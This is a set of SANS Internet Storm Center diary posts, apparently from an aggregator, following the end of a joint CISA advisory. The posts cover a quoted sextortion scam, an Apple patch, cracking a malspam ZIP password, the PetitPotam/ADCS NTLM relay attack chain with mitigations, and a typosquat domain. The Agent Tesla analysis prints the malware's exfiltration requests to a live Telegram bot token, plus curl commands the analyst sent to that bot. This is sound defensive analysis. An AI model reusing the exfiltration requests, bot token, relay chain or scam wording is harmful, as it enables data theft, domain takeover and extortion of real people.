Vulnerable Technologies and Versions

At the time of the vulnerability release, the following Microsoft Windows Server versions were vulnerable: all versions of Windows Server 2019; all versions of Windows Server 2016; Windows Server 2012 R2; Windows Server 2012; Windows Server 2008 R2 SP1; and Windows Server versions 1909/1903/1809.

References

 

For additional general best practices for mitigating cyber threats, see the joint advisory from Australia, Canada, New Zealand, the United Kingdom, and the United States on Technical Approaches to Uncovering and Remediating Malicious Activity and ACSC’s Essential Eight mitigation strategies.

Additional Resources

Free Cybersecurity Services

CISA offers several free cyber hygiene vulnerability scanning and web application services to help U.S. federal agencies, state and local governments, critical infrastructure, and private organizations reduce their exposure to threats by taking a proactive approach to mitigating attack vectors. For more information about CISA’s free services, or to sign up, email vulnerability_info@cisa.dhs.gov.

Cyber Essentials

CISA’s Cyber Essentials is a guide for leaders of small businesses as well as leaders of small and local government agencies to develop an actionable understanding of where to start implementing organizational cybersecurity practices.

Cyber.gov.au 

ACSC’s website provides advice and information about how to protect individuals and families, small- and medium-sized businesses, large organizations and infrastructure, and government organizations from cyber threats.

ACSC Partnership Program

The ACSC Partnership Program enables Australian organizations and individuals to engage with ACSC and fellow partners, drawing on collective understanding, experience, skills, and capability to lift cyber resilience across the Australian economy.

Australian organizations, including government and those in the private sector as well individuals, are welcome to sign up at Become an ACSC partner to join.

NCSC 10 Steps

The NCSC offers 10 Steps to Cyber Security, providing detailed guidance on how medium and large organizations can manage their security.

On vulnerabilities specifically, the NCSC has guidance to organizations on establishing an effective vulnerability management process, focusing on the management of widely available software and hardware.

Contact Information

To report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at www.fbi.gov/contact-us/field, or the FBI’s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by e-mail at CyWatch@fbi.gov. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. If you have any further questions related to this Joint Cybersecurity Advisory, or to request incident response resources or technical assistance related to these threats, contact CISA at Central@cisa.gov.

References

Revisions

  • Initial Version: July 28, 2021

This product is provided subject to this Notification and this Privacy & Use policy.

A sextortion e-mail from…IT support?!, (Wed, Jul 28th)

This post was originally published on this site

E-mails claiming that their author has recorded the recipient through a webcam while they were "in flagrante delicto" enjoying a visit to some pornographic site, and will publish the recording unless the recipient pays them, have been with us for quite a while now. Over time, these messages haven’t changed much. It is no wonder – since the “hook” they use is fairly timeless and nearly universal in nature, the same messages can be effective for a long time without any substantial modifications.

One can, however, still find small, interesting additions or new approaches in some sextortion messages from time to time. A good example of this was a message that was delivered to our ISC mailbox a couple of weeks ago.

Although at first glance, the message does look like any other sextortion scam, a closer look shows that its author came up with an interesting spin on the usual ransom request.

In the text, the sender claims to work for an IT service company (strictly speaking, they claim to “word” for the company, but we can probably safely assume that that was a typo, and the scammer didn’t try to make the recipient believe that they were working as a wordsmith), which was engaged by recipient’s e-mail provider. This was supposed to give the sender access to the e-mail provider’s user database and – among other information – “online traffic” of individual users.

This then supposedly allowed them to create a list of people – including the recipient – who frequented pornographic websites. The creation of the list was then allegedly followed by infection of the recipient’s computer with spyware using a malicious e-mail link, after which the usual webcam recording was supposed to take place. The rest of the message is fairly generic, as you may judge for yourself…

 


Greetings!

I have got two not really pleasant news for you.
I have been monitoring your internet activities for some time by now.

The only person to blame in this situation is you, since you are a big fan of adult websites and also have got an uncontrollable desire to indulge yourself with another orgasm.
Simply speaking, all your porn websites search requests have become a key to access your device.
The thing is that I word in a company that provides services related to security and performance of email providers, including isc.sans.edu as well.

During the pandemic outbreak a lot of providers have faced difficulties in maintaining a huge number of staff in their offices and so they have decided to use outsourcing instead.
While working remotely from home, I have got unlimited abilities to access the user databases.

I can easily decrypt passwords of users, access their chat history and online traffic with help of cookie-files.
I have decided to analyse users traffic related to adult websites and adult content.
I was truly shocked to discover that nearly 75% of users regularly access porn websites or participates in sex chats.

I have filtered out the worst perverts from the list. Yeah, you are one of them. Not everyone chooses to watch such hardcore videos… Basically, I have infected your device with one of the best Trojan viruses in the market. It was relatively easy, since I have access to your email address (handlers@isc.sans.edu).
It was sufficient to prepare one of your routine emails asking you to click the harmful link…

My spyware functions as a driver. Hence, I can fully control your device and have access to your microphone, camera, cursor and set of symbols.
Generally speaking, your device is some sort of my remote PC.
Since this spyware is driver-based, then I can constantly update its signatures, so that no antivirus can detect it.
While digging through your hard drive, I have saved your entire contact list, social media access, chat history and media files.

One week ago, I have montaged a videoclip, which shows you masturbating on one side of the screen and on the other side a porn video that you were watching at that moment of time – recently this type of exotic stuff is really popular on the internet!
Don’t worry, I will need just a few mouse clicks in order to share this video with your entire contact list and upload it to some porn website, like Bigle.
I believe that you would not like this to happen, since a long holiday season is just about to start soon – just imagine the number of silly jokes and loud laughter that would get provoked by your video all over the neighbourhood bars and pubs…

I am offering a simple and reasonable solution:
All you need to do is transfer an amount equivalent to $1150 (USA Dollars) to my bitcoin wallet and we both forget about this silly story forever.
All your data and this video will be deleted by me once and for all. You have my honest word!
You’ve got to agree, this amount is really insignificant. Just imagine how much time and resources I have spent to get this done… If you don’t know how to operate the cryptocurrency – you can always search for assistance online. It is that simple.

Here is my bitcoin wallet (BTC): bc1qfnx5388zl4c4hpcdsjxj0tgcn2gd8pyrljg6s6

You have exactly 2 days (48 hours) from the moment of opening this email.
I can easily track when you have opened this email (my software will notify me about it). Once you complete the transaction – I will be able to see and confirm that.
Please, do not try replying me via this email – there is no point in that (as you can see the email is sent from your address).

Remember that there is no point to complain anywhere, since I cannot be found (Bitcoin system is anonymous and I am also using I2P network in order to access your device).
I have considered all the small details.
In case, if 48 hours after you have opened this email, I still don’t receive the required amount of money, then your videoclip will be automatically sent to all your contact list and uploaded to public websites.

Good luck and please don’t hate me too much!

This is life! You are merely out of luck this time.
Who knows, maybe next time you will get lucky at something else…


 

Although the “I work for an IT service provider who has access to your data at work and that’s how I’ve decide to target you” is certainly an interesting addition to the usual sextortion scam (and might, perhaps, be worth mentioning during a security awareness training), it doesn’t seem to have made this specific message more effective… At least going by the “0.00000000 BTC” that was received by the address mentioned in the message at the time of writing[1].

[1] https://www.blockchain.com/btc/address/bc1qfnx5388zl4c4hpcdsjxj0tgcn2gd8pyrljg6s6

———–
Jan Kopriva
@jk0pr
Alef Nula

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Apple Patches for CVE-2021-30807, (Tue, Jul 27th)

This post was originally published on this site

Apple has released another update (previous update was only about 5 days ago) to address CVE-2021-30807 that was discovered by an anonymous researcher. This update resolves an issue with IOMobileFrameBuffer which could allow an application to execute arbitrary code with kernel privileges [1], [2]. This issue may have been actively exploited.

As Apple has indicated that this issue may have been actively exploited, it is recommended that affected devices be updated as soon as possible.

References:
[1] https://support.apple.com/en-us/HT212622
[2] https://support.apple.com/en-us/HT212623

———–
Yee Ching Tok, ISC Handler
Personal Site
Twitter

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Failed Malspam: Recovering The Password, (Mon, Jul 26th)

This post was originally published on this site

Jan's diary entry "One way to fail at malspam – give recipients the wrong password for an encrypted attachment" got my attention: it's an opportunity for me to do some password cracking 🙂 I asked Jan for the sample.

Just like Jan noticed, I saw that the sample is not actually a 7zip file, but a ZIP file. This could be a mistake by the malware authors, or it could be deliberate: 7zip is able to decompress a ZIP file with extension 7z.

And I confirm that AWB3604 is not the password.

Since it's a ZIP file, I first used my zipdump.py tool: it has a leightweight password cracking feature.

But that did not help:

Then I turned to John the Ripper. I used zip2john to create a hash for the sample, and created a password list file with a single line: AWB3604. And then I let JtR use all of its built-in rules on this "dictionary":

One of JtR's rules transformed the presumed password AWB3604 into 3604, and that turned out to be the actual password.

 

 

 

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Active Directory Certificate Services (ADCS – PKI) domain admin vulnerability, (Sat, Jul 24th)

This post was originally published on this site

Phew, this was a really bad week for Microsoft (and a lot of reading for all of us). And just when we thought that the fiasco with the SAM hive was over, a new vulnerability popped up, which is much, much more dangerous unfortunately – it allows a user to completely take over a Windows domain that has the ADCS service running. And those are probably running in majority of enterprises.

This involves chaining few things (and I’m a big fan of chaining vulnerabilities), and the bottom line issue is in relaying NTLM authentications (as has been many, many times before).

This is what’s going on now:

(1) Let’s provoke arbitrary NTLM authentication

Earlier this week, @topotam77 released a PoC tool called PetitPotam, which exploits the MS-EFSRPC (Encrypting File System Remote (EFSRPC)) protocol in order to provoke one Windows host to try to authenticate to another. This is done over LSARPC (TCP port 445) and results in making the target server connect to an arbitrary server and perform NTLM authentication.

What’s even crazier is that this can be done without any authentication – so as long as you can connect to the target server to the LSARPC named pipe with interface c681d488-d850-11d0-8c52-00c04fd90f7e, you can make that target server connect to any other server.

Here’s how this can be done:

(2) Relaying to Active Directory Certificate Services

The other vulnerability that is being exploited here is the fact that the IIS server that is used by Active Directory Certificate Services uses NTLM over HTTP for authentication. This makes it perfect for this attack. @ExAndroidDev made a fork of the amazing Responder tool and added support for this attack.

Basically, what the fork is doing is using Responder to relay NTLM authentication to the Active Directory Certificate Services IIS server. In this process it first sends a POST HTTP request to the /certsrv/certfnsh.as endpoint with an automatically generated certificate. While doing this it also passes the NTLM credentials.

If the POST request was successful, the Active Directory Certificate Services server will sign the certificate and Responder will fetch it by sending a GET HTTP request to /certsrv/certnew.cer?ReqID= where the parameter will be provided as response to the POST request.

This is what it looks like when executed:

With the certificate now, it is actually game over.

(3)    Using Rubeus to get a TGT

The attacker can now use the Rubeus tool to fetch a Kerberos TGT (Ticket Granting Ticket), by using the machine account that was initially abused to make the NTLM connection. You can probably guess it by now – if that machine was a domain controller, we can get the TGT as that domain controller machine account, which will then ultimately allow the attacker to fully compromise the domain.

It is really game over now. With this TGT in our cache, we can fetch service tickets and perform any action we want, including the Mimikatz’ famous DCSync as @gentilkiwi demonstrated.

Talk about a bad week. And weekend. Sowhat can we do?

One of main issues here is that Active Directory Certificate Services use NTLM for authentication:

So, depending on how your enterprise uses ADCS, you could disable NTLM authentication on the IIS server and this particular attack will not be possible any more. Of course, if you do not need this particular service (web based certificate enroll) – remove it completely!

Couple of other things that will help:

  • Use host based firewalls to limit connectivity as much as possible. Does your DC need to make outbound connections to port 445? Do your workstations need to allow inbound connectivity to port 445?
  • Collect IIS logs from the Active Directory Certificate Services server to your SIEM and check for those requests mentioned above.

We’ll (again) keep an eye on this, and will update the diary with new information when possible. But it looks like it will be a busy weekend for some.


Bojan
@bojanz
INFIGO IS

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Agent.Tesla Dropped via a .daa Image and Talking to Telegram, (Sat, Jul 24th)

This post was originally published on this site

A few days ago, I found an interesting file delivered by email (why change a winning combination?). The file has a nice extension: “.daa” (Direct Access Archive). We already reported such files in 2019 and Didier wrote a diary[1] about them. Default Windows installation, can’t process “.daa” files, you need a specific tool to open them (like PowerISO). I converted the archive into an ISO file and extracted the PE file inside it.

The sample was called “E445333###.exe” (SHA256:853a7edf8144e06014e0c1a841d1f1840de954a866d5ce73ff12833394ff0ead) and has a VT score of 48/70[2]. It’s a classic Agent.Tesla but this one uses another C2 channel to exfiltrate data. Instead of using open email servers, it uses Telegram (the messenger application). I started to debug the PE file (a classic .Net executable) but it took a lot of time before reaching some interesting activity so I took another approach and went back to a classic behavioral analysis. I fired a REM Workstation, connected it to the Internet through a REMnux, and launched the executable.

It took some time (approx 15 mins) before I saw the first connection to api[.]telegram[.]org:

POST hxxps://api[.]telegram[.]org/bot1815802853:AAFwTZ6mRU-UOmcTcCR8glZAAkNmzHpMkL8/sendDocument HTTP/1.1

Content-Type: multipart/form-data; boundary=---------------------------8d94d2d30eed79c

Host: api.telegram.org
Content-Length: 983
Expect: 100-continue
Connection: Keep-Alive
-----------------------------8d94d2d30eed79c
Content-Disposition: form-data; name="chat_id"

1599705393
-----------------------------8d94d2d30eed79c
Content-Disposition: form-data; name="caption"

New Log Recovered!
User Name: REM/DESKTOP-2C3IQHO
OSFullName: Microsoft Windows 10 Enterprise
CPU: Intel(R) Core(TM) i9-9980HK CPU @ 2.40GHz
RAM: 8191.49 MB
-----------------------------8d94d2d30eed79c
Content-Disposition: form-data; name="document"; filename="REM-DESKTOP-2C3IQHO 2021-07-22 04-24-32.html"
Content-Type: text/html

Time: 07/22/2021 16:24:31<br>User Name: REM<br>Computer Name: DESKTOP-2C3IQHO<br>OSFullName: Microsoft Windows 10 Enterprise<br>CPU: Intel(R) Core(TM) i9-9980HK CPU @ 2.40GHz<br>RAM: 8191.49 MB<br>IP Address: <br><hr><br><font color="#00b1ba"><b>[ Process Hacker: </b>Filter <b>]</b> <font color="#000000">(07/22/2021 16:01:01)</font></font><br>api<font color="#00ba66">{ENTER}</font><br>

-----------------------------8d94d2d30eed79c--

And the reply:

HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Thu, 22 Jul 2021 14:24:34 GMT
Content-Type: application/json
Content-Length: 662
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

{"ok":true,"result":{"message_id":6630,"from":{"id":1815802853,"is_bot":true,"first_name":"Bigdealz","username":"Bigdealzbot"},"chat":{"id":1599705393,"first_name":"Gracia","last_name":"Smith","username":"Graciasmith1","type":"private"},"date":1626963874,"document":{"file_name":"REM-DESKTOP-2C3IQHO 2021-07-22 04-24-32.html","mime_type":"text/html","file_id":"BQACAgQAAxkDAAIZ5mD5f6KNxerk3Fq4TG00ctuw4KRbAAJYCAACBovJUw5z5vTXh3vBIAQ","file_unique_id":"AgADWAgAAgaLyVM","file_size":388},"caption":"New Log Recovered!nnUser Name: REM/DESKTOP-2C3IQHOnOSFullName: Microsoft Windows 10 EnterprisenCPU: Intel(R) Core(TM) i9-9980HK CPU @ 2.40GHznRAM: 8191.49 MB"}}

A few minutes later, the Trojan started to exfiltrate screenshots:

POST hxxps://api[.]telegram[.]org/bot1815802853:AAFwTZ6mRU-UOmcTcCR8glZAAkNmzHpMkL8/sendDocument HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------8d94d3662696c53
Host: api.telegram.org
Content-Length: 194635
Expect: 100-continue
Connection: Keep-Alive

-----------------------------8d94d3662696c53
Content-Disposition: form-data; name="chat_id"

1599705393

-----------------------------8d94d3662696c53
Content-Disposition: form-data; name="caption"

New Screenshot Recovered!
User Name: REM/DESKTOP-2C3IQHO
OSFullName: Microsoft Windows 10 Enterprise
CPU: Intel(R) Core(TM) i9-9980HK CPU @ 2.40GHz
RAM: 8191.49 MB

-----------------------------8d94d3662696c53
Content-Disposition: form-data; name="document"; filename="REM-DESKTOP-2C3IQHO 2021-07-22 05-30-21.jpeg"
Content-Type: image/jpeg

JFIF``C
(1#%(:3=<9387@HN@DWE78PmQW_bghg>MqypdxegcC//cB8BccccccccccccccccccccccccccccccccccccccccccccccccccOm"
[stuff deleted]

The file that is uploaded contains a timestamp. This confirmed to me that a screenshot is exfiltrated every hour.

Because we know the bot ID, we can interact with it.

Let’s check the bot info:

remnux@remnux:~$ curl -s hxxps://api[.]telegram[.]org/bot1815802853:AAFwTZ6mRU-UOmcTcCR8glZAAkNmzHpMkL8/getMe | jq
{
  "ok": true,
  "result": {
    "id": 1815802853,
    "is_bot": true,
    "first_name": "Bigdealz",
    "username": "Bigdealzbot",
    "can_join_groups": true,
    "can_read_all_group_messages": false,
    "supports_inline_queries": false
  }
}

The user the bot is talking to is "Graciasmith1" (still online on Telegram when I'm writing this diary). Let's make it aware that we are also alive:

remnux@remnux:~$  curl -s hxxps://api[.]telegram[.]org/bot1815802853:AAFwTZ6mRU-UOmcTcCR8glZAAkNmzHpMkL8/sendMessage -X POST -d '{"chat_id":"1599705393", "text":"Ping"}' -H "Content-Type: application/json" | jq
{
  "ok": true,
  "result": {
    "message_id": 6884,
    "from": {
      "id": 1815802853,
      "is_bot": true,
      "first_name": "Bigdealz",
      "username": "Bigdealzbot"
    },
    "chat": {
      "id": 1599705393,
      "first_name": "Gracia",
      "last_name": "Smith",
      "username": "Graciasmith1",
      "type": "private"
    },
    "date": 1627107886,
    "text": "Ping"
  }
}

As you can see, today it's very touchy to spot malicious activity just by watching classic IOCs like IP addresses or domain names. Except if you prevent your users to access social networks like Telegram, who will flag traffic to api.telegram.org as suspicious? Behavioral monitoring can be the key: You can see requests at regular intervals, outside business hours, or from hosts that should not execute social network applications. Because your servers can access the Internet directly, right? 😉

[1] https://isc.sans.edu/forums/diary/The+DAA+File+Format/25246
[2] https://www.virustotal.com/gui/file/853a7edf8144e06014e0c1a841d1f1840de954a866d5ce73ff12833394ff0ead/detection

Xavier Mertens (@xme)
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Uncovering Shenanigans in an IP Address Block via Hurricane Electric's BGP Toolkit (II), (Fri, Jul 23rd)

This post was originally published on this site

Today’s diary revisits hunting for dodgy domains via Hurricane Electric's BGP Toolkit [1]. This was previously done in an earlier diary [2], and I plan to do this occasionally to share potential or identified threats so that readers can be aware of them.

I selected the IP address block of 209.58.160.0/20 this time, partly also due to a significant number of hits on my DShield sensor from this IP address block. An entry immediately caught my attention, and stood out due to the recent Akamai outage as mentioned by Johannes [3]. With reference to Figure 1, there was a site “akammai.com” lurking amongst the plethora of many other websites that was hosted on the same IP address.

Figure 1: “akammai.com” Hosted on 209.58.163[.]95

A closer inspection on the site showed a “Hello world” post, and did not display any other noticeable features (as shown in Figure 2).

Figure 2: Screenshot of “akammai.com”

As of now, the site appears to be pretty harmless. However, the domain name is quite close to the actual Akamai domain name (akamai.com). Depending on the true owner of the domain name “akammai.com”, the site could very well be repurposed and used by cybercriminals or red teams for their phishing campaigns. This is especially so due to the recent Akamai outage, or perhaps in a future unforeseen outage related to Akamai. It would be worthwhile to be wary of such domain names, particularly more so if they do not have any relation to the original site but yet bear such a close resemblance.

Indicators of Compromise (IOCs):
hxxp://akammai[.]com
209.58.163[.]95

References:
[1] https://bgp.he.net/
[2] https://isc.sans.edu/diary/27456
[3] https://isc.sans.edu/diary/27660

———–
Yee Ching Tok, ISC Handler
Personal Site
Twitter

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

"Summer of SAM": Microsoft Releases Guidance for CVE-2021-36934, (Wed, Jul 21st)

This post was originally published on this site

Microsoft released a knowledge base article regarding CVE-2021-36934 [1]. Bojan yesterday explained the vulnerability in more detail. Recent versions of Microsoft Windows expose several system files due to overly permissive access control lists. Of main interest is the Security Accounts Manager (SAM), which exposes password hashes. It has been demonstrated how this can easily be exploited by retrieving these files from shadow volumes.

Microsoft recommends to:

  • restrict access to %windir%system32config
  • delete shadow copies

Deleting shadow copies will of course affect any attempts to restore a prior system state. A new shadow copy may be created after the old copies are deleted and the permissions are adjusted.

Windows 10 1809 and newer are affected. This includes the Windows 11 Beta. Server versions of Windows are not affected. But Microsoft also states that they are still investigating which versions are affected.

[1] https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36934


Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.